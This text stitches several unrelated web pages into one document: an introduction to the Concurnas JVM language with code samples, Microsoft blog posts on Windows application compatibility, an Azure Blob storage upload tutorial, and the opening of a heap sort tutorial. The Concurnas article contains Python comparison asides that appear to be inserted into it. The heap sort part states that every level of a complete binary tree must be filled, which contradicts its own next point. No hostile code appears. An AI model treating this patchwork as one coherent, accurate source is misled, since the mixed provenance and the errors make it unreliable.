Introducing new JVM language Concurnas It’s not every day that a new JVM language is born unto the world, so to celebrate the arrival of Concurnas here’s a complete introduction to the programming language by creator Jason Tatton. Concurnas has modern syntax and features, is open source and has GPU computing built in, which opens up the possibility for machine learning applications. Let’s see what Concurnas can do! What is Concurnas and what sets it apart? Utilizing Concurnas to build software enables developers to easily and reliably realize the full computing power offered by today’s multi-core computers, allowing them to write better software and be more productive. In this article we’re going to have a look at some of the key features of Concurnas that make it unique by building the key components of a trading application for use in a finance company. The major goals of Concurnas Concurnas has been created with five major goals in mind: - To offer the syntax of a dynamically typed language with the type safety and performance of a strongly typed compiled language, with optional types, an optional degree of conciseness, and compile-time error checking. - To make concurrent programming easier, by presenting a programming model which is more intuitive to non-software engineers than the traditional thread and lock model. - To allow both researchers and practitioners alike to be productive such that an idea can be taken from idealization all the way through to production using the same language and the same code. - To incorporate and support modern trends in software engineering including null safety, traits, pattern matching and first-class citizen support for dependency injection, distributed computing and GPU computing. - To facilitate future programming language development by supporting the implementation of Domain Specific Languages and by enabling other languages to be embedded within Concurnas code.
Introduction to Concurnas

Basic syntax

Let us first start off with some basic syntax. Concurnas is a type inferred language, with optional types:

```
myInt = 99
myDouble double = 99.9 //here we choose to be explicit about the type of myDouble
myString = "hello " + " world!" //inferred as a String
val cannotReassign = 3.2f
cannotReassign = 7.6 //not ok, compilation error

anArray = [1 2 3 4 5 6 7 8 9 10]
aList = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
aMatrix = [1 2 3 ; 4 5 6 ; 7 8 9]
```

Importing code

By virtue of the fact that Concurnas runs upon the JVM and is Java compatible, we are afforded access to the existing large pool of libraries available for Java, the JDK and of course any software which the enterprise in which we are operating has already created in any JVM language (such as Scala, Kotlin etc). We can import code via familiar mechanisms:

```
from java.util import List
import java.util.Set
```

Functions

Let us now introduce functions. Concurnas is an optionally concise language, meaning that the same function may be implemented to a differing degree of verbosity to suit the target audience reading the code. As such the following three implementations are functionally identical:

```
def plus(a int, b int) int{ //the most verbose form
	return a + b
}

def plus(a int, b int) { //return type inferred as int
	a + b //implicit return
}

def plus(a int, b int) => a + b //=> may be used where the function body consists of one line of code
```

Here is a simple function we will use later on in this article:

```
def print(fmtString String, args Object...){ //args is a vararg
	System.out.println(String.format(fmtString, args))
}
```

Parameters to functions in Concurnas may be declared as vararg parameters, that is to say a variable number of arguments may be passed to them. Hence the following invocations of our print function are both valid:

```
print("hello world!") //prints: hello world!
print("hello world! %s %s %s", 1, 2, 3) //prints: hello world! 1 2 3
```

Concurrency model

Where Concurnas really stands out is in its concurrency model.
Concurnas does not expose threads to the programmer; rather, it has thread-like ‘isolates’ which are isolated units of code that, at runtime, are executed concurrently by being multiplexed onto the underlying hardware of the machine(s) upon which Concurnas is running. When creating isolates, we are constrained only by the amount of memory of the machine we are operating upon. We can create an isolate by appending a block of code or function invocation with the bang operator, !:

```
m1 String: = {"hello "}! //isolate with explicit returned type String:
m2 = {"world!"}! //spawned isolate with implicit returned type String:
msg = m1 + m2
print(msg) //outputs: hello world!
```

Above, msg will only be calculated when the isolates creating m1 and m2 have finished concurrent execution and have written their resulting values to their respective variables. Isolates do not permit sharing of state between each other other than through special types called ‘refs’. A ref is simply a normal type appended with a colon: :. For instance, above we have seen the spawned isolates returning values of type String:. Refs may be updated concurrently by different isolates on a non-deterministic basis.

SEE ALSO: How To Securely Program in Java in 2020

Refs possess a special feature in that they can be watched for changes; we can then write code to react to those changes. This is achieved in Concurnas via the onchange and every statements. onchange and every statements may return values; these values are themselves refs, since onchange and every statements operate within their own dedicated isolates:

```
a int: = 10
b int: = 10
//^two refs

oc1 := onchange(a, b){ plus(a, b) }
ev1 := every(a, b){ plus(a, b) }

oc2 <- plus(a, b) //shorthand for onchange
ev2 <= plus(a, b) //shorthand for every

//... other code
a = 50 //we change the value of a
await(ev2; ev2 == 60) //wait for ev2 to be reactively set to 60
//carry on with execution...
```
onchange statements will execute the code defined within their blocks when any one of the watched refs is changed. every statements operate in the same way, but will trigger their code for execution on every update to a watched ref, including the initial value. Thus, when ref a is updated above, variables oc1, ev1, oc2 and ev2 will be updated with the sum of a and b, with ev1 and ev2 having previously held the initial sum of a and b.

Building an application

Now that we have the basics in order, let's start to put them together in an application. Let's say we're working on financial trading systems in a typical investment bank or hedge fund. We want to quickly put together a reactive system to take ticking timestamped asset prices from a marketplace and, when the price satisfies certain criteria, perform an action. The most natural way to architect a system like this is as a reactive system which will utilize some of the special concurrency related features of the language.

Create a function

First we create a function to output some repeatably consistent pseudo random timeseries data that we can use for development and testing:

```
from java.util import Random
from java.time import LocalDateTime

class TSPoint(-dateTime LocalDateTime, -price double){
	//class with two fields having implicit getter functions, automatically defined by prefixing them with -
	override toString() => String.format("TSPoint(%S, %.2f)", dateTime, price)
}

def createData(seed = 1337){ //seed is an optional parameter with a default value
	rnd = new Random(seed)
	startTime = LocalDateTime.\of(2020, 1, 1, 0, 0) //midnight 1st jan 2020
	price = 100.
	def rnd2dp(x double) => Math.round(x*100)/100. //nested function

	ret = list()
	for(sOffset in 0 to 60*60*24){ //'x to y' - an integer range from 'x' to 'y'
		time = startTime.plusSeconds(sOffset)
		ret.add(TSPoint(time, price))
		price += rnd2dp(rnd.nextGaussian()*0.01)
	}
	ret
}
```

Above we see that we first define a class, TSPoint, the instance objects of which are used to represent the individual points of the timeseries associated with our tradeable asset. Let's check that our function outputs a sensible range of test data:

```
timeseries = createData() //call our function with default random seed
prices = t.price for t in timeseries //list comprehension

min = max Double? = null //min and max may be null
for(price in prices){
	if(min == null or price < min){
		min = price
	}elif(max == null or price > max){
		max = price
	}
}
print("min: %.2f max: %.2f", min, max)
//outputs: min: 96.80 max: 101.81
```

When calling our function with the default random seed, we can see that it outputs a reasonable intra-day range of data: "min: 96.80 max: 101.81".

Nullable types

Now is a great time for us to introduce the support that Concurnas has for nullable types. In keeping with modern trends in programming languages, Concurnas (like Kotlin and Swift) is a null safe language. That is to say, if a variable has the capacity for being null, it must be explicitly declared as such; otherwise it is assumed to be non null. It is not possible to assign a null value to a non null type; rather, the type must be explicitly declared as being nullable by appending it with a question mark, ?:

```
aString String
aString = null //this is a compile time error, aString cannot be null

nullable String?
nullable = null //this is ok
len = nullable.length() //this is a compile time error as nullable might be null
```

We see above that the call to nullable.length() results in a compile time error, as nullable might be null, which would cause the function invocation of length() to throw the dreaded NullPointerException.
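Python has no compile-time null safety, but the same hazard exists at runtime: calling a method on None raises the Python equivalent of a NullPointerException. As a point of comparison, here is a small Python sketch of the guard-before-use discipline (the helper name `length_or` is my own, not from the article; static checkers such as mypy can flag these cases ahead of time):

```python
# Optional marks a value that may be None -- the analogue of a nullable type.
from typing import Optional

def length_or(s: Optional[str], default: int = -1) -> int:
    """Use s only after proving it is not None, else fall back to a default."""
    return len(s) if s is not None else default

print(length_or(None))     # -> -1
print(length_or("hello"))  # -> 5
```

Nothing stops a careless caller from writing `len(None)` in Python; the check above is a convention, whereas Concurnas enforces it in the type system.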
To our aid, however, Concurnas offers a number of operators which make working with variables of a nullable type, like our nullable variable, safer. They are as follows:

```
len1 Integer? = nullable?.length() //1. the safe call dot operator
len2 int = (nullable?: "oops").length() //2. the elvis operator
len3 int = nullable??.length() //3. the non null assertion operator
```

These operators behave as follows:

- The safe call dot operator will return null (and therefore a nullable type) if the left hand side of the dot is a nullable type resolving to null.
- The elvis operator is similar to the safe call operator except that when the left hand side is null, the specified value on the right hand side of the operator is returned instead of null ("oops" in our example above).
- The non null assertion operator disables the null protections and will simply throw an exception if its left hand side resolves to null.

Concurnas is also able to infer the scope of nullability for nullable types. In areas where we have asserted that a nullable variable is not null (for instance, in a branching if statement), we are able to use the variable as if it were not nullable:

```
def returnsNullable() String? => null

nullableVar String? = returnsNullable()

len int = if(nullableVar <> null){
	nullableVar.length() //ok because nullableVar cannot be null here!
}else{
	-1
}
print(len) //prints: -1
```

Together, this support for nullable types helps us write more reliable, safer programs.

Trigger a trading operation

We shall now continue to build our trading system; we want to trigger a trading operation as soon as the tracked asset reaches a certain price. We can use an onchange block to trigger this process when the price of the asset is above 101.71:

```
lastTick TSPoint: //our asset timeseries

onchange(lastTick){
	if(lastTick.price > 101.71){
		//perform trade here...
		return
	}
}
```

Notice above the use of return within the onchange block; this ensures that when the trading condition is met, the associated trading operation is performed only once, after which the onchange block terminates. Without the return statement, the onchange block would trigger whenever the trading condition is met, until lastTick goes out of scope.

Creating a ref

We can easily perform other interesting things along the lines of the previous pattern. For instance, we can create a ref, lowhigh, of the rolling high/low prices for the day as follows:

```
lowhigh (TSPoint, TSPoint): //lowhigh is a tuple type

onchange(lastTick){
	if(not lowhigh:isSet()){ //using : allows us to call methods on refs themselves
		lowhigh = (lastTick, lastTick)
	}else{
		(prevlow, prevHigh) = lowhigh //tuple decomposition
		if(lastTick.price < prevlow.price){
			lowhigh = (lastTick, prevHigh)
		}elif(lastTick.price > prevHigh.price){
			lowhigh = (prevlow, lastTick)
		}
	}
}
```

Build an object-oriented system

Now that we have the dealing and informational components of our trading system prepared, we are ready to build an object oriented system using them. To do this we are going to take advantage of the support built into Concurnas for Dependency Injection (DI). DI is a modern software engineering technique, the use of which makes reasoning about, testing and re-using object oriented software components easier. In Concurnas, first class citizen support is provided for DI in the form of object providers; these are responsible for creating the graph of, and injecting dependencies into, provided instances of classes.
Usage is optional but pays dividends for large projects:

```
trait OrderManager{
	def doTrade(onTick TSPoint) void
}

trait InfoFeed{
	def display(lowhigh (TSPoint, TSPoint):)
}

inject class TradingSystem(ordManager OrderManager, infoFeed InfoFeed){
	//classes marked as inject may have their dependencies injected
	def watch(){
		tickStream TSPoint:
		lowhigh (TSPoint, TSPoint):

		onchange(tickStream){
			if(not lowhigh:isSet()){
				lowhigh = (tickStream, tickStream)
			}else{
				(prevlow, prevHigh) = lowhigh
				if(tickStream.price < prevlow.price){
					lowhigh = (tickStream, prevHigh)
				}elif(tickStream.price > prevHigh.price){
					lowhigh = (prevlow, tickStream)
				}
			}
		}

		infoFeed.display(lowhigh:) //appending : indicates pass-by-ref semantics

		onchange(tickStream){
			if(tickStream.price > 101.71){
				ordManager.doTrade(tickStream)
				return
			}
		}

		tickStream:
	}
}

actor TestOrderManager ~ OrderManager{
	result TSPoint:

	def doTrade(onTick TSPoint) void {
		result = onTick
	}

	def assertResult(expected String){
		assert result.toString() == expected
	}
}

actor TestInfoFeed ~ InfoFeed{
	result (TSPoint, TSPoint):

	def display(lowhigh (TSPoint, TSPoint):) void{
		result := lowhigh //:= assigns the ref itself instead of the ref's value
	}

	def assertResult(expected String){
		await(result ; (""+result) == expected)
	}
}

provider TSProviderTests{
	//this object provider performs dependency injection into instance objects of type TradingSystem
	provide TradingSystem
	single provide OrderManager => TestOrderManager()
	single provide InfoFeed => TestInfoFeed()
}

//create our provider and create a TradingSystem instance:
tsProvi = new TSProviderTests()
ts = tsProvi.TradingSystem()

//Populate the tickStream with our test data
tickStream := ts.watch()
for(tick in createData()){
	tickStream = tick
}

//extract tests and check results are as expected...
testOrdMng = tsProvi.OrderManager() as TestOrderManager
testInfoFeed = tsProvi.InfoFeed() as TestInfoFeed

//validation:
testOrdMng.assertResult("TSPoint(2020-01-01T04:06:18, 101.71)")
testInfoFeed.assertResult("(TSPoint(2020-01-01T19:59:10, 96.80), TSPoint(2020-01-01T10:10:05, 101.81))")

print('All tests passed!')
```

The above introduces another two interesting features of Concurnas: traits and actors. Traits in Concurnas are inspired by traits in Scala; here, however, we are simply using them like interfaces (as seen in languages such as Java), in that they specify methods which concrete implementing classes must provide. Actors in Concurnas are special classes, the instance objects of which may be shared between different isolates, as actors have their own concurrency control so as to avoid non-deterministic changes to their internal state by multiple isolates interacting with them concurrently.

SEE ALSO: What to look for in an OpenJDK Distro

Building a reactive system such as the above from scratch with traditional programming languages would of course be a long winded affair. As can be seen above, with Concurnas this is a straightforward operation.

Domain Specific Languages (DSLs)

Another nice feature of Concurnas is its support for Domain Specific Languages (DSLs). Expression lists are one feature which makes implementing DSLs easy. Expression lists essentially enable us to skip writing dots and parentheses around method invocations. This leads to a more natural way of expressing algorithms. We can use this in our example trading system.
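Stepping back to dependency injection for a moment: the essence of the provider pattern above — test doubles wired into the trading system by a provider object rather than constructed inline — can be sketched in plain Python. The class and method names below are my own simplifications, not the Concurnas API:

```python
class TestOrderManager:
    """Test double standing in for a real order manager."""
    def __init__(self):
        self.trades = []

    def do_trade(self, price):
        self.trades.append(price)

class TradingSystem:
    """Dependencies arrive via the constructor -- never built internally."""
    def __init__(self, order_manager):
        self.order_manager = order_manager

    def on_tick(self, price):
        # same one-shot trigger condition as the article's example
        if price > 101.71 and not self.order_manager.trades:
            self.order_manager.do_trade(price)

class TestProvider:
    """Plays the role of the Concurnas object provider: it owns the wiring."""
    def __init__(self):
        self._om = TestOrderManager()  # 'single provide': one shared instance

    def order_manager(self):
        return self._om

    def trading_system(self):
        return TradingSystem(self._om)

provider = TestProvider()
ts = provider.trading_system()
for price in [100.0, 101.5, 101.8, 102.0]:
    ts.on_tick(price)
print(provider.order_manager().trades)  # -> [101.8]
```

Because the provider hands the same test double to both the system under test and the assertions, validating behavior needs no mocking framework — the same benefit the Concurnas provider delivers with language-level support.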
The following is perfectly valid Concurnas code:

```
order = buy 10e6 when GT 101.71
```

This is enabled by creating our order API as follows:

```
enum BuySell{BUY, SELL}

def buy(amount double) => Order(BuySell.BUY, amount)
def sell(amount double) => Order(BuySell.SELL, amount)

open class Trigger(price double)
class GT(price double) < Trigger(price)
class LT(price double) < Trigger(price)

class Order(direction BuySell, amount Double){
	trg Trigger?
	def when(trg Trigger) => this.trg = trg; this
}

order = buy 10e6 when GT 101.71
```

Additionally, though not covered here, Concurnas supports operator overloading and extension functions.

GPU computing support

Now let us briefly look at the support built into Concurnas for GPU computing. GPUs can be thought of as massively data parallel computation devices that are ideally suited to performing math oriented operations on large datasets. Whereas today a typical high end CPU (e.g. AMD Ryzen Threadripper 3990X) may have up to 64 cores – affording us up to 64 instances of concurrent computation – a comparable GPU (e.g. NVIDIA Titan RTX) has 4608! All graphics cards in modern computers have a GPU; effectively, we all have access to a supercomputer. It is common for algorithms implemented on the GPU to be up to 100x faster (or more!) than their CPU implementations. Furthermore, the relative cost of this computation when performed on a GPU, from a hardware and power perspective, is far lower than its CPU counterpart.

There is however a catch… GPU algorithms have a relatively esoteric implementation, and the nuances of the underlying GPU hardware must be understood in order to obtain optimal performance. Traditionally, knowledge of C/C++ has been a requirement. With Concurnas things are different. Concurnas has first class citizen support for GPU computing, meaning that support is built directly into the language itself to enable developers to leverage the power of GPUs.
Thus we can write idiomatic Concurnas code and have syntactic and semantic checks performed at compile time in one step, greatly simplifying our build process and eliminating the need for us to learn C/C++ or rely upon runtime checks of our code. GPU algorithms are implemented in entry points known as a gpukernel. Let's look at a simple algorithm for matrix multiplication (a core component of linear algebra which is heavily used in machine learning and finance):

```
gpukernel 2 matMult(wA int, wB int, global in matA float[2], global in matB float[2], global out result float[2]) {
	globalRow = get_global_id(0) // Row ID
	globalCol = get_global_id(1) // Col ID

	rescell = 0f;
	for (k = 0; k < wA; ++k) { //matrices are flattened to vectors on the gpu...
		rescell += matA[globalCol * wA + k] * matB[k * wB + globalRow];
	}
	// Write element to output matrix
	result[globalCol * wA + globalRow] = rescell;
}
```

This GPU kernel presents a succinct but naive implementation. The code can be optimized to improve performance significantly, for instance through the use of local memory. For now, though, this is good enough. We can compare this to our traditional CPU based matrix multiplication algorithm as follows:

```
def matMultCPU(A float[2], B float[2]) {
	n = A[0].length
	m = A.length
	p = B[0].length

	result = new float[m][p]
	for(i = 0; i < m; i++){
		for(j = 0; j < p; j++){
			for(k = 0; k < n; k++){
				result[i][j] += A[i][k] * B[k][j]
			}
		}
	}
	result
}
```

The core matrix multiplication algorithm is the same across the GPU and CPU implementations. However, there are some differences: the GPU kernel itself is executed in parallel on our GPU, with the only distinction between those individual parallel executions being the values returned from the get_global_id calls – these are used to identify which part of the data set the instance should be targeting. Additionally, return values need to be passed into GPU kernels. Now that we have created our GPU kernel we are able to execute it on the GPU.
This is more involved than standard CPU based computation in that we are setting up an asynchronous pipeline of data copying to the GPU, kernel execution, results copying from the GPU and, finally, cleanup. Luckily Concurnas leverages the ref model of concurrency in order to streamline this process, which also serves to let us keep our GPU busy (thus maximizing throughput), use multiple GPUs concurrently and do other CPU based work at the same time as GPU execution:

```
def compareMulti(){
	//we wish to perform the following on the GPU: matA * matB
	//matA and matB are both matrices of type float
	matA = [1f 2 3 ; 4f 5 6; 7f 8 9]
	matB = [2f 6 6; 3f 5 2; 7f 4 3]

	//use the first gpu available
	gps = gpus.GPU()
	deviceGrp = gps.getGPUDevices()[0]
	device = deviceGrp.devices[0]

	//allocate memory on gpu
	inGPU1 = device.makeOffHeapArrayIn(float[2].class, 3, 3)
	inGPU2 = device.makeOffHeapArrayIn(float[2].class, 3, 3)
	result = device.makeOffHeapArrayOut(float[2].class, 3, 3)

	//asynchronously copy input matrices from RAM to GPU
	c1 := inGPU1.writeToBuffer(matA)
	c2 := inGPU2.writeToBuffer(matB)

	//create an executable kernel reference: inst
	inst = matMult(3, 3, inGPU1, inGPU2, result)

	//asynchronously execute with 3*3 => 9 'threads'
	//if c1 and c2 have not already completed, wait for them
	compute := device.exe(inst, [3 3], c1, c2)

	//copy result matrix from GPU to RAM
	//if compute has not already completed, wait for it
	ret = result.readFromBuffer(compute)

	//cleanup
	del inGPU1, inGPU2, result
	del c1, c2, compute
	del deviceGrp, device
	del inst

	//print the result
	print('result via GPU: ' + ret)
	print('result via CPU: ' + matMultCPU(matA, matB))
	//prints:
	//result via GPU: [29.0 28.0 19.0 ; 65.0 73.0 52.0 ; 101.0 118.0 85.0]
	//result via CPU: [29.0 28.0 19.0 ; 65.0 73.0 52.0 ; 101.0 118.0 85.0]
}
```

Closing thoughts

This concludes our article for now.
We’ve looked at many of the aspects of Concurnas which make it unique, though there are many more features of interest to the modern programmer, such as first class citizen support for distributed computing, temporal computing, vectorization, language extensions, off heap memory management, lambdas and pattern matching, to name a few. Check out the Concurnas website or dive straight into the GitHub repo.
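As an aside, the small matrix product used in the GPU example above is easy to sanity-check in plain Python with the same triple loop as the CPU implementation:

```python
def mat_mult_cpu(A, B):
    """Naive triple-loop matrix multiplication, mirroring matMultCPU above."""
    n, m, p = len(A[0]), len(A), len(B[0])
    result = [[0.0] * p for _ in range(m)]
    for i in range(m):
        for j in range(p):
            for k in range(n):
                result[i][j] += A[i][k] * B[k][j]
    return result

# the same input matrices as the article's compareMulti example
matA = [[1, 2, 3], [4, 5, 6], [7, 8, 9]]
matB = [[2, 6, 6], [3, 5, 2], [7, 4, 3]]
print(mat_mult_cpu(matA, matB))
# -> [[29.0, 28.0, 19.0], [65.0, 73.0, 52.0], [101.0, 118.0, 85.0]]
```

The result matches the article's printed output, [29.0 28.0 19.0 ; 65.0 73.0 52.0 ; 101.0 118.0 85.0].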
https://jaxenter.com/introducing-new-jvm-lanaguage-concurnas-167915.html
Tips on Windows Application Compatibility

I know I could talk all day about application compatibility topics and not cover everything that can be discussed. Here's a one-hour webcast I did that focuses on the top issues and most confusing topics for application compatibility. I do some of my favorite demos showing UAC architecture, data redirection, services isolation, and mandatory integrity control. The target audience is developers and testers. Here's the webcast: Developing Compatible Applications for Windows 7.

My main goal in this presentation is to talk about moving applications from XP or Vista to Windows 7 and demystify some of the common problems. I also wanted to "plug" the Application Compatibility Cookbooks. These documents are some of the best resources for understanding what breaking changes have occurred and how to mitigate them. Make sure to reference both cookbooks. Most of the breaking changes are in the original XP to Vista cookbook.

Moving from XP -> Vista/2008 -> Win7: "Application Compatibility Cookbook"
Moving from Vista -> Win7: "Windows 7 Application Quality Cookbook"

I haven't posted in a while. I've been helping out with a couple of other programs we have going on in the labs these days. OEM Ready is a subset of Certified for Windows Vista, targeted at applications that ship on new PCs. If you are using the automation in the OEM Ready Certification Test Tool, you can get a false failure if your application has a UTF-8 embedded manifest that has the byte order mark (BOM) included. Visual Studio 2008 includes the BOM if you use it to embed the manifest. Sigcheck is used by the test tool to dump the manifest, and it outputs the BOM as garbage characters. This throws off the test tool and it gives an incorrect result. This is a known bug with the tools and will be fixed. For now, if you run into this problem, you can submit this test case as a pass.
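The BOM condition described above is easy to detect (and strip) yourself before submitting a manifest for testing. A small sketch — the helper names are my own, not part of the OEM Ready tooling — using the fixed three-byte UTF-8 BOM sequence:

```python
# The UTF-8 byte order mark is always these three bytes at the start of the file.
UTF8_BOM = b"\xef\xbb\xbf"

def has_utf8_bom(data: bytes) -> bool:
    return data.startswith(UTF8_BOM)

def strip_utf8_bom(data: bytes) -> bytes:
    """Return the data with a leading BOM removed, if one is present."""
    return data[len(UTF8_BOM):] if has_utf8_bom(data) else data

# simulate a manifest as embedded by Visual Studio 2008 (BOM included)
manifest = UTF8_BOM + b'<?xml version="1.0" encoding="UTF-8"?><assembly/>'
clean = strip_utf8_bom(manifest)
print(has_utf8_bom(manifest), has_utf8_bom(clean))  # -> True False
```

Running the check against a manifest extracted from your binary tells you in advance whether the test tool will trip over the BOM.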
…add the roles and features that are needed. So, from an application compatibility point of view, your application may require a role that isn't installed by default. There are two ways to programmatically query what roles and features are installed.

Using ServerManagerCmd

There's a cool command line utility that has been added to Windows Server 2008 called ServerManagerCmd. ServerManagerCmd allows you to add, remove, and query roles and features. If you execute the following command:

> servermanagercmd.exe -query roles.xml

an XML file of all the roles and features installed will be created. You could then parse that file to determine what roles and features are installed. I was hoping to find something in the scripting repository to do this but couldn't find anything. PowerShell would be a good option but remember... no features are installed by default. PowerShell and .NET 3.0 would need to be installed. You could do that with ServerManagerCmd as well. For example:

> servermanagercmd.exe -install Powershell

ServerManagerCmd is great for scripting, but what if you want to determine installed roles in your application's installer? ...or avoid lots of parsing in a script? ...or avoid needing to install .NET and PowerShell? WMI is probably a better choice.

With Windows Server 2008, there is a new class in the WMI namespace \Root\cimv2 called Win32_ServerFeature. This will allow you to use WMI to iterate through what roles and features are installed. WMI is a very good option for determining in your installer whether a prerequisite role is installed.

…this blog. The first thing to mention is the Application Compatibility Cookbook. This is the primer of application compatibility. I was going to call it the K&R of Application Compatibility, but I don't want to date myself ;-). I highly recommend reading the cookbook, or at least keeping it handy as a reference.
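Returning briefly to the ServerManagerCmd approach above: the "parse that file" step is a few lines in any scripting language. Here is a hedged Python sketch of the parsing pattern — note that the element and attribute names in the sample XML are illustrative assumptions, not ServerManagerCmd's exact output schema:

```python
import xml.etree.ElementTree as ET

# stand-in for the contents of roles.xml produced by `servermanagercmd -query`
sample = """<ServerManagerConfigurationQuery>
  <Role DisplayName="Web Server (IIS)" Installed="true"/>
  <Role DisplayName="DNS Server" Installed="false"/>
  <Feature DisplayName="Windows PowerShell" Installed="true"/>
</ServerManagerConfigurationQuery>"""

def installed_components(xml_text):
    """Collect the display names of roles/features flagged as installed."""
    root = ET.fromstring(xml_text)
    return [el.get("DisplayName")
            for el in root.iter()
            if el.tag in ("Role", "Feature") and el.get("Installed") == "true"]

print(installed_components(sample))  # -> ['Web Server (IIS)', 'Windows PowerShell']
```

Against the real file you would adjust the tag and attribute names to match the actual schema; the traversal itself stays the same.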
Now that you've looked at the cookbook (go look at it now if you haven't), you are probably saying, "Whew, that's a lot of stuff. Can you just tell me the top issues with Application Compatibility?" So, let's start with a list of the top areas of issues:

User Account Control (UAC)

UAC is intended to run applications as standard user by default. Even if you are a member of the administrators group, applications that are not marked to run with administrator privileges will run with reduced "standard user" rights. Applications may not be designed to run as a standard user and may not have rights or privileges to certain resources.

Installation

Installation issues usually revolve around UAC. Almost all installers need to run with admin rights because they usually write to Program Files or to HKLM in the registry. MSI issues usually revolve around custom actions being run in the wrong context (user or admin).

Service Isolation

On Vista and Windows Server 2008, only services run in session 0; desktop applications run in sessions 1+n. This blocks Windows messages between services and desktop apps. This also blocks services from displaying UI on the desktop.

Internet Explorer Protected Mode

IE in protected mode is sometimes called "Low Rights IE". When protected mode is on, IE runs at a low integrity level. This isolates IE from the rest of the processes and resources on the system. ActiveX controls and browser objects may not have appropriate rights running in protected mode.

That's it for now. One final note: the area for all things regarding Application Compatibility can be found on TechNet.

I'm Pat Altimore, an Application Developer Consultant who spends most of my time working in the Application Compatibility Labs at Microsoft. I'm planning on posting stuff of interest that we find in the lab.
I hope the posts here will be helpful to developers that are getting their apps ready for Vista or Windows Server 2008 (and beyond). There are a lot of great blogs by other AppCompat consultants out there. Please check out: MaartenB, CJacks, and Aaron_Margosis.
http://blogs.msdn.com/patricka/
In this article, we'll learn how to use Azure Blob storage in ASP.NET Web Forms and how to upload an image file to Blob storage from code-behind. Before reading this article, please go through the following article:

In this article, I'll tell you, step by step:

Step 2: Go to Templates, Visual C#, then ASP.NET Web Application.

Step 3: In the name section, give a name to the project. Here I have given the name "Azure Blob Storage".

Step 4: Click the "OK" button to create the project. In the following figure, choose the "Empty" project template and click the "OK" button.

We can see that our project contains three categories of items: Properties, References, and Web.config. Now we need to install the Windows Azure Storage package in order to use Azure Storage access and all supported classes.

Go to the "TOOLS" menu, select "NuGet Package Manager", and select "Manage NuGet Packages for Solution". In the following figure, go to the search box and type "azure". After this you will find "Windows Azure Storage"; click the "Install" button. Now in the following figure, you can see the installation of "Windows Azure Storage". In the following window, you will be asked to install "Windows Azure Storage" for the current project; since we want to install the packages for the current project, simply click the "OK" button. The installation process then runs. In the following figure, click the "I Accept" button. We have now successfully installed "Windows Azure Storage" (in the small red circle). Click the "Close" button.

We also need to install the Azure Storage Client packages, so go to the search box and type "Azure Storage Client". After typing, click the "Install" button. We have successfully installed the "Azure Storage Client" package as well.

Go to your project; here my project name is "Azure Blob Storage". Right-click the project, select "Add" and select "New Item".
Here, I am going to create a Web Form, so select Web Form in the list and give a name to your Web Form; here I gave mine the name "MyForm", but you can give yours any name. Click the "Add" button. After creating the form, you can see in your project that the form was created successfully, with the name "MyForm.aspx".

In the "MyForm.aspx.cs" page, let me make some changes. In the "MyForm.aspx.cs" page, I have added all the namespaces that are minimally required. Now we need an "accountname" and "accesskey" to connect with the Azure account, so go to the Azure portal. Go to the "Storage" option, where I have created a Storage Account with the name "nitindemostorage" in my previous article. You can visit my previous Azure article for details.

Here, after clicking the Storage Account named "nitindemostorage", go to the bottom of the window and select "Manage Access Keys". You will find the following window; copy the "Storage Account Name" and "Primary Access Key" from here. Go back to your project and make some changes there. Paste the copied items into "accountname" and "accesskey", then add code to connect to the Azure storage account via a "CloudStorageAccount" class object, and finally convert your image into a stream and upload it, as in the following image.

One more thing: we need to create a Web App profile for publishing our app into the cloud. Simply go to "WEB APPS" in your Azure portal and click "New" to add a new Web App. After clicking "New", you will see the following window. Go to the "COMPUTE" option, select "WEB APP", and select "QUICK CREATE". In the URL section, you can write your Web App name. Here I have given "nitinblobstoragedemo"; if the entered name is valid, a check sign (in blue) will appear. In the "APP SERVICE PLAN" section, click "Default1 (East Asia, Shared)". Click "CREATE WEB APP". We have created our Web App successfully. After doing this, we can see our created Web App ("nitinblobstoragedemo").
And it is in running mode. We also make some changes in the Web.config file; here, in <add value="MyForm.aspx"/>, "MyForm" is my Web Form. We can publish the project in two ways, and I am going to discuss both.

First, right-click your project (here my project is "AzureBlobStorage") and select the "Publish" option. In the following figure, you can see "nitinblobstoragedemo", which is the Web App we created at the start. Select your Web App profile and click the "Publish" button. After clicking the "Publish" button, the project is published to the cloud as well as to your Azure Explorer.

The second way to publish your project is through the cloud: you can download your publish profile from the Azure account in your Web Apps. For this, click on your Web App profile and, in the "Publish your app" section, click "Download the publish profile". After clicking, your profile will be downloaded to your system. After this, we can see the status of our publishing; my "nitinblobstoragedemo" app service published successfully. Now build your project and get your output.

Now run the application: press F5. So, finally, we got our output. We can see the changes in our Azure Explorer. Now refresh the Azure Explorer to check your image. "Sampleblob.jpg" is my image, which was generated programmatically. Right-click the image to open it; if you want to fetch the images by code into your view, you can see that in my next article, so wait for that and stay tuned. It can take a few moments while the image download is in progress. Here's the final output, and you can see my image.

Thanks for reading this article, and wait for the next one. Connect("Nitin Pandit");
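(Aside: for readers working outside .NET, the same upload flow looks roughly like this with the modern Python SDK, azure-storage-blob v12. This is a hedged sketch, not the article's code — the account, container, blob and file names are all placeholders, and the import is deferred so the function can be defined without the package installed:)

```python
def upload_image_to_blob(account_name, account_key, container, blob_name, image_path):
    """Upload a local image file to Azure Blob storage as a stream."""
    # requires: pip install azure-storage-blob
    from azure.storage.blob import BlobServiceClient

    service = BlobServiceClient(
        account_url=f"https://{account_name}.blob.core.windows.net",
        credential=account_key,
    )
    blob = service.get_blob_client(container=container, blob=blob_name)
    with open(image_path, "rb") as stream:
        blob.upload_blob(stream, overwrite=True)
```

A call such as `upload_image_to_blob("nitindemostorage", "<primary access key>", "mycontainer", "Sampleblob.jpg", "local.jpg")` would mirror the CloudStorageAccount-based upload described above.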
https://www.c-sharpcorner.com/UploadFile/8ef97c/upload-image-to-azure-blob-storage-in-Asp-Net-part-2/
Heap Sort is a popular and efficient sorting algorithm in computer programming. Learning how to write the heap sort algorithm requires knowledge of two types of data structures: arrays and trees. The initial set of numbers that we want to sort is stored in an array, e.g. [10, 3, 76, 34, 23, 32], and after sorting we get a sorted array [3, 10, 23, 32, 34, 76]. Heap sort works by visualizing the elements of the array as a special kind of complete binary tree called a heap.

What is a complete Binary Tree?

Binary Tree
A binary tree is a tree data structure in which each parent node can have at most two children. In the above image, each element has at most two children.

Full Binary Tree
A full binary tree is a special type of binary tree in which every parent node has either two or no children.

Complete binary tree
A complete binary tree is just like a full binary tree, but with two major differences:
- Every level must be completely filled.
- All the leaf elements must lean towards the left.
- The last leaf element might not have a right sibling, i.e. a complete binary tree doesn't have to be a full binary tree.

How to create a complete binary tree from an unsorted list (array)?
- Select the first element of the list to be the root node. (First level - 1 element)
